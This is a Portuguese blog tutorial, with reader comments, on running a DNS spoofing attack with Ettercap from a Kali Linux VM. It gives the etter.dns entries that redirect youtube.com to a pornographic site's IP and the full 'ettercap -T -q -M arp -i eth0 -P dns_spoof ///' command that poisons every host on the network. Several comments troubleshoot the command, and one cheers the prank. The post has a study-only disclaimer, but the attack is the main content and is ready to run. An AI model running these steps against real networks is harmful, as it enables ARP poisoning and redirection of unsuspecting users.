ArtigosOffensive

Realizando Ataque de DNS Spoofing Com Ettercap

Pessoal nesse post iremos abordar a execução do ataque de dns spoofing utilizando a ferramenta Ettercap, como aqui no site nós já vimos alguns artigos sobre spoofing não vou ficar entrando em muitos detalhes. Para aqueles que ainda não viram acesse: Entendendo e Realizando Um Ataque Arp Spoofing e Entendendo e Atacando Com SSLStrip.

Descrição do DNS Spoofing

O DNS Spoofing é o comprometimento na segurança ou na integridade dos dados em um Sistema de Nomes de Domínios (Domain Name System DNS). Esse problema acontece quando os dados que são introduzidos na cache de um servidor de nomes DNS não se originam do servidor de nomes DNS com autoridade real. Tal problema pode ser uma tentativa de ataque malicioso em um servidor de nomes, mas também pode ser o resultado de um erro não intencional de configuração na cache do servidor DNS.
Fonte: Wikipedia

Descrição do Laboratório

Estamos utilizando uma VM do VirtualBox com 1Gb de Ram e 1 Core do Processador Core 2 Duo. A distribuição para execução dos testes é o Kali Linux. Acesse Como Criar VM’s no VirtualBox.

Atacando

Antes de fazer qualquer coisa, precisamos decidir para qual site a vítima será redirecionada no momento do ataque. Vou ser um pouco “sacana” e redirecionar o usuário para o site xnxx.com quando ele acessar o youtube. então vamos começar. Primeiramente edite o arquivos etter.dns do ettercap.

# pico /etc/ettercap/etter.dns

Depois Adicione as linhas abaixo

youtube.com           A       141.0.174.39
www.youtube.com       A       141.0.174.39

Explicação

youtube.com : É o domínio alvo, quando o cliente acessar esse domínio ele será redirecionado para outro lugar.
A : Tipo de redirecionamento de DNS.
141.0.174.39 : IP do site para onde o cliente será redirecionado.

Depois é só executar o seguinte comando no terminal:

# ettercap -T -q -M arp -i eth0 -P dns_spoof ///

Explicação

ettercap: Comando da ferramenta utilizada.
-T: Utiliza modo texto.
-q: Seta o modo silencioso.
-M arp: Tipo de redirecionamento.
-i eth0: Interface de rede.
-P dns_spoof: Plugin utilizado para o ataque.
/// :  Seleciona toda rede.

Agora em algum host da rede acesse o site youtube.com para fazer o teste, veja que você será redirecionado para o ip do site pornográfico que informamos no arquivo etter.dns, é importante lembrar que se tiver alguma proteção contra spoof na rede esse ataque não ira funcionar. Quando um cliente acessa o domínio alvo ira aparecer na tela do atacante como é mostrado na imagem.

Conclusão

Pronto, nesse ponto os usuários já não são capazes de acessar o youtube. Você pode combinar esse ataque com algumas outras técnicas, nós próximos posts irei mostrar como realizar um ataque utilizando o SET e o Ettercap juntos. Vale lembrar que esse conhecimento é válido somente para estudos, não vão sair por ai a fora fazendo isso, isso é crime e caso seja pego dá cadeia.

Não esqueçam de curtir nossas páginas nas redes sociais, FacebookG+ e seguir o Guia do Ti no Twitter. Compartilhem e comentem esse artigo, isso é muito importante para divulgação do nosso trabalho.

Ricardo Galossi
Siga me
Últimos posts por Ricardo Galossi (exibir todos)

Ricardo Galossi

É um apaixonado por segurança da informação, atua profissionalmente há mais de 7 anos na área de tecnologia da informação, onde é focado em análise de vulnerabilidades e testes de invasão. Criou o blog Guia do TI para compartilhar conhecimento, ajudar os mais novos, incentivar debates e manter a comunidade atualizada com as principais notícias da área de TI.

9 thoughts on “Realizando Ataque de DNS Spoofing Com Ettercap

  • Henrique Giorgianni

    A hora que eu vou salvar a alteração feita no ettercap.dns dá esse erro ai. oque eu posso fazer ?

    [ Error writing /etc/ettercap/etter.dns: No such file or directory ]

    Resposta
    • Ricardo Galossi

      Esse erro está dizendo que o arquivo ou diretório não existe, confere se houve alguma alteração da versão do Kali que está usando.

      Resposta
    • Bruno da Silva

      Não tá atualizado. Dá sudo apt-get ettercap ou simplesmente cria o arquivo dentro da pasta etc/ettercap com as configurações adequadas. Att

      Resposta
  • Ewerton Silva

    Comigo não funcionou.
    Erro: Sorry, plugin ‘dns_spoof//’ can not be found – skipping!

    Estou usando o Kali Linux 2.0

    Resposta
    • Bruno da Silva

      Resposta meio atrasada, mas pra quem tiver tendo o mesmo problema é o seguinte

      dns_spoof e // deve ter um espaço no meio.

      Resposta
  • Bruno da Silva

    Para iniciante mesmo esse tutorial né?

    Enfim

    – Em rede wireless precisa wlan0 ou 0 seria o número da placa, mas você precisa dar ifconfig para ver quais interface disponíveis no sistema.

    – Não se se é apenas nas novas versões, mas seria três barras após dns_spoof e não duas

    – Coloque sudo na frente para permitir rodar o aplicativo em modo administrativo (root)

    No meu caso, basicamente seria:

    sudo ettercap -T -q -M arp -i wlan0 -P dns_spoof ///

    Um grande abraço. Bruno da Silva.

    Resposta
  • Matheus Carneiro

    Galera ! preciso que alguém me ajuda.

    fasso todo procedimento certo desde comfigurar o ettrcap.conf ate eniciar o snnifer no ettercap

    Mas a questão eh, quando eu inicio o sniiff e vor no navegador ele não
    e redirecionado pra pagina que eu configurei lah no arquivo
    ettercap.dns, ele não vai para nehuma , so aparece que falando: FALHA NA
    CONXÃO SEGURA

    alguem pode me ajudar oque ta epedindo ser redirecionado para pagina que desejo.

    Resposta
  • FSH7339

    kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk Mano, o blog ficou otimo ! adorei essa de redirecionar os cara para os porn hub da vida kkkkkkkkkkkkkkkk valeu, eu sabia como usar +/- o ettercap, porem nao sabia onde ficava o arquivo !

    Resposta

Deixe seu comentário